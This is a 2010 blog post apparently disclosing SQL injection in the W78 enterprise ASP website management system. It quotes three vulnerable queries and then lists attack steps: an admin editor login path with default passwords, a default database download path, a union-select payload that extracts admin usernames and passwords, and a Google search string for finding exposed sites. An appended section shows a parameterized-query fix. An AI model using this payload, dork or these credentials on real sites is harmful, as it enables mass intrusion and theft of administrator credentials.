Category: Network and Security
2010-03-21 00:08:27
SQL injection in W78 Enterprise ASP Website Management System V1.1
A system with no protection at all.
1.shopmore.asp
set rs=server.createobject("adodb.recordset")
exec="select * from [shop] where ssfl="& request.QueryString("id") &" order by id desc "
rs.open exec,conn,1,1
if rs.eof then
response.Write " 该分类暂无产品!"
else
rs.PageSize =20 'records per page
iCount=rs.RecordCount 'total number of records
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request("page")
if Not IsNumeric(page) or page="" then
page=1
2.about.asp
exec="select * from [about] where id="& request.QueryString("id")
set rs=server.createobject("adodb.recordset")
rs.open exec,conn,1,1
3.search_news.asp
dim title
title=request.form("form_news")
set rs=conn.execute("select * from [news] where title like '%"&title&"%'")
if title="" then
response.write ("")
end if
if rs.eof then
response.write ("")
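Other pages are affected as well.
4. The login page of this system's online editor is admin/eWebEditor/admin/login.asp
Default user: admin, password: 198625
If that does not get in, you can also try:
The default back-end passwords are these two: 86779533 and abc123
Also try the default database location, /data/%23sze7xiaohu.mdb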
exp:
Search-type injection: %' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
Google:inurl:ShopMore.asp?id
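
The three queries quoted above (shopmore.asp, about.asp, search_news.asp) build their SQL by concatenating Request.QueryString("id") and Request.Form("form_news") straight into the statement. As an added example (not code from the original post or from W78), the same lookups written with bound ADODB.Command parameters; ParseId and OpenBound are hypothetical helpers, conn is assumed to be the pages' existing open connection, and ssfl and id are assumed to be numeric columns.

```vbscript
' Added example, not W78's code. Assumes conn is the open ADODB.Connection
' used by the pages above, and that ssfl and id are numeric columns.
Const adInteger = 3, adVarWChar = 202, adParamInput = 1
Const adCmdText = 1, adUseClient = 3, adOpenStatic = 3, adLockReadOnly = 1

' Hypothetical helper: accept only a short run of digits, else return -1.
Function ParseId(raw)
    Dim re, s
    ParseId = -1
    s = Trim(raw & "")              ' coerce the Request item to a string
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"     ' 9 digits at most, so CLng cannot overflow
    If re.Test(s) Then ParseId = CLng(s)
End Function

' Hypothetical helper: bind one value to the single ? in sql and open a
' static client-side recordset, so RecordCount/PageSize paging still works.
Function OpenBound(sql, pType, pSize, pValue)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = sql
    cmd.Parameters.Append cmd.CreateParameter("p1", pType, adParamInput, pSize, pValue)
    Set rs = Server.CreateObject("ADODB.Recordset")
    rs.CursorLocation = adUseClient
    rs.Open cmd, , adOpenStatic, adLockReadOnly
    Set OpenBound = rs
End Function

Dim id, rs, title
id = ParseId(Request.QueryString("id"))
If id < 0 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' shopmore.asp: the category id is bound as an integer
Set rs = OpenBound("select * from [shop] where ssfl=? order by id desc", adInteger, 4, id)

' about.asp: same pattern
Set rs = OpenBound("select * from [about] where id=?", adInteger, 4, id)

' search_news.asp: the wildcards belong to the bound value, not to the SQL text
title = Left(Request.Form("form_news") & "", 100)
Set rs = OpenBound("select * from [news] where title like ?", adVarWChar, 102, "%" & title & "%")
```

With the value bound this way, a quote or union clause in form_news is compared as literal text by like and never reaches the SQL parser.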